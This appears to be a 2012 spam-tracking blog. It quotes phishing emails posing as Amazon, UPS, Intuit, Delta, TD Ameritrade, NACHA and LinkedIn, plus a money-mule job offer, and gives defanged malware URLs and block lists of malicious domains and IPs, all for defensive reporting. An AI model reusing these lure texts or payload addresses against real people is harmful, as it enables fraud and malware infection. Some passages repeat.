The message may appear to be sent from your own email address (this is why). The malicious payload is on [donotclick]savidae.net/main.php?page=f8475ba078c011af (report here) hosted on 178.238.130.222 (BurstNet UK, allocated to an individual in Ukraine). These other domains are on the same server, their status is not known.
beingconducts.info
burstingqualcomm.info
cameratoburnergo.info
carpetingpenny.info
clevererreviewed.info
crisisproducer.info
delightsmalwarespywarefree.info
elsedefer.info
enotatepreview.info
expostypes.info
insigniamake.info
meetscellsafety.info
methodicaldiskinternals.info
needingshirts.info
overwhelminglymustdownload.info
premisepreliminary.info
relinquishingpin.info
restoreculled.info
ringtonererender.info
shiftvirtues.info
smartmedialaserlike.info
taxcasterbolstered.info
tubez11.cu.cc
wearguitarlike.info
woodantispy.info
xxxxlivechat.info
UPDATE:
A similar campaign is underway with a payload on peace-computer.com (the same domain is used in this attack)
Another example:
Sent: den 11 juli 2012 16:19
Subject: Your Amazon.com order of "Withings WiFi Body Scale, Black" has shipped!
Hello,
Shipping Confirmation
Order # 353-3382862-1240149
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
Withings WiFi Body Scale, Black $139.95
Item Subtotal: $139.95
Shipping & Handling: $0.00
Total Before Tax: $139.95
Shipment Total: $139.95
Paid by Visa: $139.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
==========
Subject: Your Amazon.com order of "Boss JWVX3Y6 7-Inch DVD/MP3/CD Widescreen Bluetooth Receiver with USB and SD Card" has shipped!
Hello,
Shipping Confirmation
Order # 087-2687938-8778762
Your estimated delivery date is:
Friday, July 13 2012
Track your package Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Shipment Details
Boss JWVX3Y6 7-Inch DVD/MP3/CD Widescreen Bluetooth Receiver with USB and SD Card $149.95
Item Subtotal: $149.95
Shipping & Handling: $0.00
Total Before Tax: $149.95
Shipment Total: $149.95
Paid by Visa: $149.95
You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.
Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
==========
Intuit.com spam / thaidescribed.com
This spam leads to malware on thaidescribed.com:
The malicious payload is on [donotclick]thaidescribed.com/main.php?page=8cb1f95c85bce71b (report here) hosted on 164.15.250.148 (Universite Libre de Bruxelles, Belgium). The malicious IPs and domains associated with this attack can also be found here, but you should probably block the following:
afriget.net
fonografs.net
proamd-inc.com
thaidescribed.com
80.77.87.185
164.15.250.148
200.184.213.131
Date: Tue, 10 Jul 2012 13:49:59 -0300
From: "LinkedIn Communication" [USPS_Shipping_Services@usps.com]
Subject: New Payment through the Intuit network.
Incoming payment received: You received $840.00 from Parks LLC for invoice 53389
You can access the payment details here.
Funds will be transferred in your bank account.
You now have the opportunity to get paid by Credit Card on your invoices. To learn more please sign in to your IPN account and click on the 'Profile' tab on the left.
The malicious payload is on [donotclick]thaidescribed.com/main.php?page=8cb1f95c85bce71b (report here) hosted on 164.15.250.148 (Universite Libre de Bruxelles, Belgium). The malicious IPs and domains associated with this attack can also be found here, but you should probably block the following:
afriget.net
fonografs.net
proamd-inc.com
thaidescribed.com
80.77.87.185
164.15.250.148
200.184.213.131
UPS Spam / proamd-inc.com
Date: Tue, 10 Jul 2012 20:34:41 +0200The malicious payload is at [donotclick]proamd-inc.com/main.php?page=8cb1f95c85bce71b (report here) hosted on 164.15.250.148 (Universite Libre de Bruxelles, Belgium).
From: "Vernon Wade" [USPS_Shipping_Services@usps.com]
Subject: Your UPS invoices are ready for download.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for download in UPS billing center. Do not forget that your UPS invoices should be paid within 28 days so as not to incur any additional charges.
Please surf to the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official blog
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
==========
Date: Tue, 10 Jul 2012 19:20:05 +0330
From: "Don Reyes" [USPS_Shipping_Services@usps.com]
Subject: Please download and pay your UPS delivery charges.
This is an automatically generated email Please do not reply to this email address.
Dear UPS Customer,
New invoice(invoices) are available for viewing in UPS billing center. Do not forget that your UPS invoices should be paid within 28 days to avoid any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read our official blog
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
==========
From: Miguel Segura [mailto:USPS_Shipping_Services@usps.com]
Sent: 10 July 2012 16:47
Subject: You have outstanding UPS invoices.
This is an automatically generated email Please do not reply to this email address.
Valued UPS Customer,
New invoice(invoices) are available for download in UPS billing center. Please note that your UPS invoices should be paid within 21 days so as not to incur any additional charges.
Please visit the UPS Billing Center to view and pay your invoice.
________________________________________
Find out more about UPS:
Visit ups.com
Explore UPS Freight Services
Learn About UPS Companies
Sign Up For Additional Email From UPS
Read Compass Online
________________________________________
(c) 2012 United Parcel Service of America, Inc. UPS, the UPS brandmark, and the color brown are trademarks of United Parcel Service of America, Inc. All rights reserved.
For more information on UPS's privacy practices, refer to the UPS Privacy Policy.
Please do not reply directly to this e-mail. UPS will not receive any reply message.
For questions or comments, visit Contact UPS.
This communication contains proprietary information and may be confidential. If you are not the intended recipient, the reading, copying, disclosure or other use of the contents of this e-mail is strictly prohibited and you are instructed to please delete this e-mail immediately.
Privacy Policy
Contact UPS
The following domains and IPs are also involved in this attack and should be blocked:
afriget.net
fonografs.net
proamd-inc.com
thaidescribed.com
80.77.87.185
164.15.250.148
200.184.213.131
Friday, 6 July 2012
"Your Receipt and Itinerary" spam / ellomb.net
From: Johnny Mooney [mailto:kxijgvpu@asistencia.org]The malicious payload is on [donotclick]ellomb.net/main.php?page=d502255d1a941be3 (not resolving when I tried to analyse it) hosted on 83.69.226.143 (Awax Telecom, Russia). Incidentally, 83.69.226.0/24 all looks pretty bad and is worth blocking.
Sent: 06 July 2012 13:56
Subject: Your Receipt and Itinerary
Thank you for choosing Delta. We encourage you to review this information before your trip. If you need to contact Delta or check on your flight information, go to delta.com, call 800-221-1212 or call the number on the back of your SkyMiles© card.
Now, managing your travel plans just got easier. You can exchange, reissue and refund electronic tickets at delta.com. Take control and make changes to your itineraries at delta.com/itineraries.
Speed through the airport. Check-in online for your flight.
Flight Information
DELTA CONFIRMATION #: C1N270
TICKET #: 31894208655700
Day Date Flight Status Bkng
Class City Time Meals/
Other Seat/
Cabin
--- ----- --------------- ------ ----- ---------------- ------ ------ -------
Sun 8 JUL DELTA 116 OK U LV NYC-KENNEDY
AR SAN FRANCISCO 515P
916P F 45A
COACH
Mon 9 JUL DELTA 1837 OK K LV SAN FRANCISCO
AR NYC-KENNEDY 1230P
702A# V 32A
COACH
Baggage and check-in requirements vary by airport and airline, so please check with the operating carrier on your ticket.
Please review Delta's check-in Requirements and baggage guidelines for details.
You must be checked in and at the gate at least 15 minutes before your scheduled departure time for travel inside the United States.
You must be checked in and at the gate at least 45 minutes before your scheduled departure time for international travel.
For tips on flying safely with laptops, cell phones, and other battery-powered devices, please visit http://SafeTravel.dot.gov.
Do you have comments about our service? Please email us to share them with us.
-----------------------------------------------------------------------------
Conditions of Carriage
Air transportation on Delta and the Delta Connection carriers is subject to Delta's conditions of carriage. They include terms governing, for example:
Limits on our liability for personal injury or death of passengers, and for loss, damage or delay of goods and baggage.
Claim restrictions, including time periods within which you must file a claim or bring an action against us
Our right to change terms of the contract
Check-in requirements and other rules establishing when we may refuse carriage
Our rights and limits of our liability for delay or failure to perform service, including schedule changes, substitution of alternative air carriers or aircraft, and rerouting
Our policy on overbooking flights, and your rights if we deny you boarding due to an oversold flight
These terms are incorporated by reference into our contract with you. You may view these conditions of carriage on delta.com, or by requesting a copy from Delta.
Wednesday, 4 July 2012
Malware sites to block 4/7/12
These malicious domains and IPs are being used in the current "runforestrun" malware attacks. The domains are registered on a daily basis, block the IPs might be more effective in this case.
bdvkpbuldslsapeb.ru
clockworkorange.org
dernflilrdxmfnye.ru
eilqnjkoytyjuchn.ru
evilstalin.https443.net
fjgtmicxtlxynlpf.ru
gytcnulxsxpsqkfn.ru
hyoflopkupjioiqq.ru
iekiyvsbtyozmmwy.ru
keglxucgvwhqttmi.ru
lfbovcaitdrjmkbe.ru
npxsiiwpxqqiihmo.ru
ppsvcvrcgkllplyn.ru
qtmyeslmsoxkjbku.ru
ruhctasjmpqbyvhm.ru
skwkybckmywhrhbb.ru
smolny.https443.org
tlrnhskrgijhwtlj.ru
upmqpwyndzwzmmwy.ru
vqhtwlshzzqsltcp.ru
yrxysfyekjfooere.ru
88.198.68.110
94.100.27.16
141.136.17.97
188.138.11.75
188.211.239.249
bdvkpbuldslsapeb.ru
clockworkorange.org
dernflilrdxmfnye.ru
eilqnjkoytyjuchn.ru
evilstalin.https443.net
fjgtmicxtlxynlpf.ru
gytcnulxsxpsqkfn.ru
hyoflopkupjioiqq.ru
iekiyvsbtyozmmwy.ru
keglxucgvwhqttmi.ru
lfbovcaitdrjmkbe.ru
npxsiiwpxqqiihmo.ru
ppsvcvrcgkllplyn.ru
qtmyeslmsoxkjbku.ru
ruhctasjmpqbyvhm.ru
skwkybckmywhrhbb.ru
smolny.https443.org
tlrnhskrgijhwtlj.ru
upmqpwyndzwzmmwy.ru
vqhtwlshzzqsltcp.ru
yrxysfyekjfooere.ru
88.198.68.110
94.100.27.16
141.136.17.97
188.138.11.75
188.211.239.249
Labels:
Malware
Firefox OS: will it be safe?
Firefox OS is the new name for the "boot to gecko" project by the Mozilla foundation. It's a fully-featured OS built on a Linux core, and this is what Mozilla have to say about it:
This led me to pose the question in another publication: Firefox OS: will it be safe? Well, if you know Betteridge's Law of Headlines then the answer is probably "no".
We have been down this path before. ActiveX promised to allow the browser (in this case Internet Explorer) access to the system to allow it to do clever things. Yes, software authors could get their applications signed to demonstrate that they were trustworthy, but it was still a security nightmare. And despite the apparent death of ActiveX (when was the last time you installed an ActiveX component that wasn't Adobe Flash?) it still features prominently when it comes to patching.
And then there's Java. Java was meant to be safe because it was sandboxed from the rest of the machine it was running on, making it inherently safe. Fast forward to today.. and what is one of the most common vectors for malware infection? Yes, it's Java. Fundamentally the Java security model is broken, as the endless series of patches we see testifies to.
From a security perspective, keeping the browser just as a browser and limiting the interaction is has with the OS is the best approach. But the Firefox OS wants to turn that on its head. And while Mozilla will no doubt put in processes to try to ensure that it will be safe, the examples of Java and ActiveX show how difficult it can be to nail it down.
Why does it matter? There's a lot of hype about mobile malware at the moment, but in my experience it is still an almost insignificant threat. That will change though, as more and more smartphones and tablets are being used for financially sensitive transactions, and fundamentally a smartphone is just a small computer and it can be added to a botnet for evil purposes.
One last consideration is this - getting updates. As (mostly) Android users will know, OS updates tend to dry up shortly after launch leaving the underlying system vulnerable.. although Apple owners tend to get updates for a much longer time. Keeping on top of security threats will require Mozilla, the manufacturers and networks to co-operate closely to keep security updates rolling out. The Firefox OS model closely matched Android rather than Apple.. so Mozilla and its partners have their work cut out here too.
If you're interested, this article I wrote is a slightly different take on the subject.
The Firefox OS for mobile devices is built on Mozilla’s “Boot to Gecko project” which unlocks many of the current limitations of web development on mobile, allowing HTML5 applications to access the underlying capabilities of a phone, previously only Unix and Linux based mobile OSes available to native applications. Telefónica’s Digital unit joined forces with Mozilla earlier this year to take this work and showcase a new phone architecture where every phone feature (calling, messaging, games, etc.) is an HTML5 application.Wait.. what? Basically, the browser can interact directly with the operating system.. and this is being done at a time when vendors are trying to keep the browser as seperated as possible from the OS to mitigate against exploits.
This led me to pose the question in another publication: Firefox OS: will it be safe? Well, if you know Betteridge's Law of Headlines then the answer is probably "no".
We have been down this path before. ActiveX promised to allow the browser (in this case Internet Explorer) access to the system to allow it to do clever things. Yes, software authors could get their applications signed to demonstrate that they were trustworthy, but it was still a security nightmare. And despite the apparent death of ActiveX (when was the last time you installed an ActiveX component that wasn't Adobe Flash?) it still features prominently when it comes to patching.
And then there's Java. Java was meant to be safe because it was sandboxed from the rest of the machine it was running on, making it inherently safe. Fast forward to today.. and what is one of the most common vectors for malware infection? Yes, it's Java. Fundamentally the Java security model is broken, as the endless series of patches we see testifies to.
From a security perspective, keeping the browser just as a browser and limiting the interaction is has with the OS is the best approach. But the Firefox OS wants to turn that on its head. And while Mozilla will no doubt put in processes to try to ensure that it will be safe, the examples of Java and ActiveX show how difficult it can be to nail it down.
Why does it matter? There's a lot of hype about mobile malware at the moment, but in my experience it is still an almost insignificant threat. That will change though, as more and more smartphones and tablets are being used for financially sensitive transactions, and fundamentally a smartphone is just a small computer and it can be added to a botnet for evil purposes.
One last consideration is this - getting updates. As (mostly) Android users will know, OS updates tend to dry up shortly after launch leaving the underlying system vulnerable.. although Apple owners tend to get updates for a much longer time. Keeping on top of security threats will require Mozilla, the manufacturers and networks to co-operate closely to keep security updates rolling out. The Firefox OS model closely matched Android rather than Apple.. so Mozilla and its partners have their work cut out here too.
If you're interested, this article I wrote is a slightly different take on the subject.
Tuesday, 3 July 2012
TD Ameritrade spam / princess-sales.net
Date: Tue, 3 Jul 2012 21:38:09 +0530
From: "Micah Bright" [client@notifications.tdameritrade.com]
Subject: sbj
TD Ameritrade
Your account ending in XXX7 Log on
Your statement is now available online
Dear Valued Client,
Your statement for your TD Ameritrade account ending in XXX7 is now available online.
Access your statements
To view your statement (along with previous statements), please Log On to your account and choose "History & Statements" (under Accounts). Then click the "Statements" tab, select the appropriate month(s) under the "View statements" drop-down menu, then click the "View" button.
We're here to help
If you have any questions, please log on to your account and click "Message Center" (under Home) to write us. A representative will respond through your Message Center inbox. You can also call Client Services at 800-669-3900. We're available 24 hours a day, seven days a week.
Sincerely,
Tom Bradley
President, Retail Distribution
TD Ameritrade
The malicious payload is at [donotclick]princess-sales.net/main.php?page=7e45713861176c6b (report here) hosted on 203.237.211.223 in Korea.
Fake jobs: careerin-finance.com
This email is trying to recruit people for money laundering ("money mule") operations and other similar illegal activities:
The email may appear to come from the recipient (see "why am I sending myself spam?". The domain careerin-finance.com was registered on 2nd July 2012 and solicits replies via a server at 37.247.48.176 (Prometeus, Italy).
Registrant details for the domain are no doubt fake:
The domain is registered through scam-friendly Chinese registrar BIZCN.COM, Inc.
Nameservers are:
ns1.readycarts.com (37.247.48.176)
ns2.readycarts.com (12.199.102.98)
The 12.199.102.98 is registered to Barnes and Noble in the US. Is there a compromised server here? It's hard to be certain.
The following IPs and domains all seem to be connected:
12.199.102.98
24.217.45.10
37.247.48.176
62.108.39.201
agentrachel.net
americafindjob.com
jobbinthai.com
latviafindjob.com
readycarts.com
From: [victim]
Date: 2 July 2012 20:48:51 GMT+01:00
To: [victim]
Subject: Recruitment in the large company
We have an excellent opportunity for an apprentice applicant to join a rapidly expanding company.
An at home Key Account Manager Position (Ref: 58020-095/1HR) is a great opportunity for stay at home parents or anyone who wants to work in the comfort of their own home.
This is a genuine offer and not to be confused with scams!
The successful candidate must have the ability to handle calls efficiently whilst maintaining the highest levels of customer service and being courteous.
Applicants must have an excellent telephone manner, have a friendly approach, excellent communication skills and be computer literate.
You must have the ability to type and talk at the same time to customers,
as you will be taking customer details over the phone and inputting data onto company database.
Requirements: computer with Internet access, valid email address, good typing skills.
If you fit the above description and meet the requirements, please apply to this ad stating your location.
You will be processing orders from your computer. How much you earn is up to you.
The average is in the region of US$600- US$750.00 per week, depending on whether you work full or part time.
If you would like more information, please contact us stating where you are located and our job reference number - 58020-095/1HR.
Please only SERIOUS applicants.
Our contacts: Olin@careerin-finance.com
Thank You!
The email may appear to come from the recipient (see "why am I sending myself spam?". The domain careerin-finance.com was registered on 2nd July 2012 and solicits replies via a server at 37.247.48.176 (Prometeus, Italy).
Registrant details for the domain are no doubt fake:
Helen R. Espinoza
Helen Espinoza info@careerin-finance.com
413-845-0684 fax: 413-845-0331
3093 Trouser Leg Road
Springfield MA 01103
us
Helen Espinoza info@careerin-finance.com
413-845-0684 fax: 413-845-0331
3093 Trouser Leg Road
Springfield MA 01103
us
The domain is registered through scam-friendly Chinese registrar BIZCN.COM, Inc.
Nameservers are:
ns1.readycarts.com (37.247.48.176)
ns2.readycarts.com (12.199.102.98)
The 12.199.102.98 is registered to Barnes and Noble in the US. Is there a compromised server here? It's hard to be certain.
The following IPs and domains all seem to be connected:
12.199.102.98
24.217.45.10
37.247.48.176
62.108.39.201
agentrachel.net
americafindjob.com
jobbinthai.com
latviafindjob.com
readycarts.com
Labels:
Job Offer Scams,
Spam
Monday, 2 July 2012
American Airlines spam / ghanarpower.net
Date: Mon, 2 Jul 2012 16:54:15 +0200
From: "Cornelius Meyers" <notify@aa.globalnotifications.com>
Subject: Online American Airlines receipt.
Record Locator: MWNMLP
Date of Issue: 2JULY12
Thank you for choosing American Airlines / American Eagle, a member of the oneworld� Alliance.
This receipt is for the purchase of your Preferred Seat(s) which are detailed on your itinerary and receipt confirmation.
If you have any questions regarding your reservations, please call 1-800-433-7300 or visit www.aa.com.
Record Locator: MWNMLP
PASSENGER
CHADBOURN HAWLEY
DOCUMENT NUMBER / DATE
0010634774011/2JULY12
DESCRIPTION
PREFERRED SEATS
AMOUNT
17.67 USD
TAX
1.33
TOTAL
19.00 USD
Payment Type: Visa XXXXXXXXXXXX1392 Total: $19.00
================
Date: Mon, 2 Jul 2012 17:59:25 +0430
From: "Spencer Hurley" <notify@aa.globalnotifications.com>
Subject: Preferred seat purchase receipt.
Record Locator: XTSPJI
Date of Issue: 2JULY12
Thank you for choosing American Airlines / American Eagle, a member of the oneworld� Alliance.
This receipt is for the purchase of your Preferred Seat(s) which are detailed on your itinerary and receipt confirmation.
If you have any questions regarding your reservations, please call 1-800-433-7300 or visit www.aa.com.
Record Locator: XTSPJI
PASSENGER
CHADBOURN HAWLEY
DOCUMENT NUMBER / DATE
0010634774011/2JULY12
DESCRIPTION
PREFERRED SEATS
AMOUNT
17.67 USD
TAX
1.33
TOTAL
19.00 USD
Payment Type: Visa XXXXXXXXXXXX1293 Total: $19.00
The malicious payload is the same as used in this attack - blocking it and the related IPs and domains is probably wise.
TD Ameritrade Spam / ghanarpower.net
________________________________________
Your account ending in XXX7 Log on
________________________________________
Your statement is now available online
Dear Valued Client,
Your statement for your TD Ameritrade account ending in XXX7 is now available online.
Access your statements
To view your statement (along with previous statements), please Log On to your account and choose "History & Statements" (under Accounts). Then click the "Statements" tab, select the appropriate month(s) under the "View statements" drop-down menu, then click the "View" button.
We're here to help
If you have any questions, please log on to your account and click "Message Center" (under Home) to write us. A representative will respond through your Message Center inbox. You can also call Client Services at 800-669-3900. We're available 24 hours a day, seven days a week.
Sincerely,
Tom Bradley
President, Retail Distribution
TD Ameritrade
The malware can be found on [donotclick]ghanarpower.net/main.php?page=8c6c59becaa0da07 (report here) hosted on (188.165.1.192, OVH Ireland).
The following IPs and domains are connected to this attack and should also be blocked:
ecocabmedia.net
ghanarpower.net
lessthansmoothmasculine.com
68.171.101.22
92.201.139.15
188.165.1.192
109.164.221.176
211.157.105.160
Thursday, 28 June 2012
Pinterest Spam / medicarewichi.com
Spammers will try anything.. this email pretends to be from Pinterest but it actually appears to lead to a fake pharma site at medicarewichi.com.
The spamvertised site is hosted on 91.238.180.92 which looks like a cesspit of toxic sites and is probably best blocked.
From: Pinterest [mailto:pinbot@pinterest.com]
Sent: 28 June 2012 14:41
Subject: New pins added
Hi!
With millions of new pins added every week, we connecting people all over the world based on shared tastes and interests. Explore pins
©2012 Pinterest, Inc. | All Rights Reserved.
Privacy Policy | Terms and Conditions
The spamvertised site is hosted on 91.238.180.92 which looks like a cesspit of toxic sites and is probably best blocked.
Labels:
Fake Pharma,
Pinterest,
Spam
Malware sites to block 28/6/12
These malicious sites and IPs are connected with this spam run. I recommend blocking them.
31.17.189.212
41.66.137.155
41.168.5.140
50.57.43.49
50.57.88.200
62.76.45.241
62.76.188.120
62.76.189.62
62.76.191.172
62.213.64.161
64.120.134.7
66.90.76.62
83.143.134.23
83.170.91.152
85.17.72.34
85.214.204.32
87.204.199.100
91.210.189.68
91.221.70.19
94.75.231.156
95.142.167.193
95.168.185.214
95.168.185.215
95.168.185.216
95.168.185.217
95.168.185.218
95.211.18.79
110.234.150.163
110.234.176.99
128.134.57.112
173.203.96.79
178.33.105.222
178.63.208.37
178.63.249.35
178.63.249.45
184.106.189.124
184.106.200.41
188.72.199.247
188.72.220.158
188.212.156.170
190.81.107.70
194.109.21.8
195.14.104.76
200.169.13.84
208.158.5.195
209.114.47.158
211.44.250.173
219.94.194.242
caoodntkioaojdf.ru
clkjshdflhhshdf.ru
ckjsfhlasla.ru
ckjhasbybnhdjf.ru
cruikdfoknaofa.ru
debiudlasduisioa.ru
dkjhasjllasllalaa.ru
dhjikjsdhfkksjud.ru
dinamitbtzusons.ru
dkijhsdkjfhsdf.ru
dnvfodooshdkfhha.ru
doorpsjjaklskfjak.ru
dpasssjiufjkaksss.ru
dppriakjsdjfhss.ru
dsakhfgkallsjfd.ru
forumenginesspb.ru
hamlovladivostok.ru
harmoniavslove.ru
insomniacporeed.ru
kroshkidlahlebans.ru
monashkanasene.ru
opimmerialtv.ru
pekarniamsk.ru
piloramamoskow.ru
porscheforumspb.ru
rushsjhdhfjsldif.su
seledkindoms.ru
semelyontour.ru
spbfotomontag.ru
somaniksuper.ru
spiritzandmore.com
sshgjksdfhhsd.ru
superproomgh.ru
sushfpappsbf.ru
tarantsikvasiliy.ru
zolindarkksokns.ru
31.17.189.212
41.66.137.155
41.168.5.140
50.57.43.49
50.57.88.200
62.76.45.241
62.76.188.120
62.76.189.62
62.76.191.172
62.213.64.161
64.120.134.7
66.90.76.62
83.143.134.23
83.170.91.152
85.17.72.34
85.214.204.32
87.204.199.100
91.210.189.68
91.221.70.19
94.75.231.156
95.142.167.193
95.168.185.214
95.168.185.215
95.168.185.216
95.168.185.217
95.168.185.218
95.211.18.79
110.234.150.163
110.234.176.99
128.134.57.112
173.203.96.79
178.33.105.222
178.63.208.37
178.63.249.35
178.63.249.45
184.106.189.124
184.106.200.41
188.72.199.247
188.72.220.158
188.212.156.170
190.81.107.70
194.109.21.8
195.14.104.76
200.169.13.84
208.158.5.195
209.114.47.158
211.44.250.173
219.94.194.242
caoodntkioaojdf.ru
clkjshdflhhshdf.ru
ckjsfhlasla.ru
ckjhasbybnhdjf.ru
cruikdfoknaofa.ru
debiudlasduisioa.ru
dkjhasjllasllalaa.ru
dhjikjsdhfkksjud.ru
dinamitbtzusons.ru
dkijhsdkjfhsdf.ru
dnvfodooshdkfhha.ru
doorpsjjaklskfjak.ru
dpasssjiufjkaksss.ru
dppriakjsdjfhss.ru
dsakhfgkallsjfd.ru
forumenginesspb.ru
hamlovladivostok.ru
harmoniavslove.ru
insomniacporeed.ru
kroshkidlahlebans.ru
monashkanasene.ru
opimmerialtv.ru
pekarniamsk.ru
piloramamoskow.ru
porscheforumspb.ru
rushsjhdhfjsldif.su
seledkindoms.ru
semelyontour.ru
spbfotomontag.ru
somaniksuper.ru
spiritzandmore.com
sshgjksdfhhsd.ru
superproomgh.ru
sushfpappsbf.ru
tarantsikvasiliy.ru
zolindarkksokns.ru
Labels:
.SU,
Evil Network,
Malware,
Viruses
NACHA Spam / porscheforumspb.ru
This fake NACHA spam leads to malware on porscheforumspb.ru:
The malicious payload is on [donotclick]porscheforumspb.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here), hosted on the following IPs:
110.234.176.99 (Tulip Telecom, India)
128.134.57.112 (Seoul Kwangun University, Korea)
190.81.107.70 (Telmex, Peru)
Date: Wed, 27 Jun 2012 06:18:09 -0430
From: "Electronic Payments Association" [donotreply@nacha.org]
Subject: Fwd: ACH Transfer rejected
The ACH transfer, initiated from your bank account, was canceled.
Canceled transfer:
Bath Nr.: FE-45452995330US
Transaction Report: View
ADELINE Jewell
Automated Clearing House, NACHA
The malicious payload is on [donotclick]porscheforumspb.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c (report here), hosted on the following IPs:
110.234.176.99 (Tulip Telecom, India)
128.134.57.112 (Seoul Kwangun University, Korea)
190.81.107.70 (Telmex, Peru)
Labels:
NACHA,
Printer Spam,
RU:8080,
Spam,
Viruses
LinkedIn spam / 74.63.252.106
This fake LinkedIn spam leads to malware on 74.63.252.106:
The malicious payload is at [donotclick]74.63.252.106/getfile.php?u=71fd37ed (report here) which is part of a small netblock of 74.63.252.96/27 rented out by Limestone Networks in the US. Some attempt has been made to prevent analysis by generating a fake 403 page if you try to analyse it directly.
Date: Thu, 28 Jun 2012 00:52:04 +0200
From: "2012, LinkedIn Corporation" [sdexheimer@itrs.com.br]
To: [y009-xc6.ftdsf@catchamail.com]
Subject: Relationship LinkedIn Mail
REMINDERS
Invitation reminders:
• From Kevin Sellers (VP Analytic Services at Glencore)
PENDING MESSAGES
• There are a total of 9 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
The malicious payload is at [donotclick]74.63.252.106/getfile.php?u=71fd37ed (report here) which is part of a small netblock of 74.63.252.96/27 rented out by Limestone Networks in the US. Some attempt has been made to prevent analysis by generating a fake 403 page if you try to analyse it directly.
Labels:
LinkedIn
Wednesday, 27 June 2012
Thursday, 21 June 2012
Malware sites to block 21/6/12
These sites and IPs are all connected to recent malicious spam runs. Blocking them either by IP address or domain name would probably be prudent.
46.162.27.165
64.79.106.188
91.227.220.114
109.164.221.176
109.169.86.139
173.234.9.84
187.5.116.251
192.84.186.206
199.101.99.155
abc-spain.net
abilenepaint.net
asiazmile.net
autobouracky.net
autosnort.net
chicleart.net
computerpills.net
cool-mail.net
energirans.net
grapecomputers.net
gtautond.com
hiring-decisions.com
hseclub.net
installandwork.com
itscholarshipz.net
jobforfamily.com
keurigminis.net
mynourigen.net
leadgems.net
perfectbusinesschance.net
savecoralz.net
synergyledlighting.net
systemtestnow.com
workandlivenow.com
workathomeforyou.net
yourfreeworkathome.net
yourlifechance.net
46.162.27.165
64.79.106.188
91.227.220.114
109.164.221.176
109.169.86.139
173.234.9.84
187.5.116.251
192.84.186.206
199.101.99.155
abc-spain.net
abilenepaint.net
asiazmile.net
autobouracky.net
autosnort.net
chicleart.net
computerpills.net
cool-mail.net
energirans.net
grapecomputers.net
gtautond.com
hiring-decisions.com
hseclub.net
installandwork.com
itscholarshipz.net
jobforfamily.com
keurigminis.net
mynourigen.net
leadgems.net
perfectbusinesschance.net
savecoralz.net
synergyledlighting.net
systemtestnow.com
workandlivenow.com
workathomeforyou.net
yourfreeworkathome.net
yourlifechance.net
Labels:
Evil Network
Subscribe to:
Posts (Atom)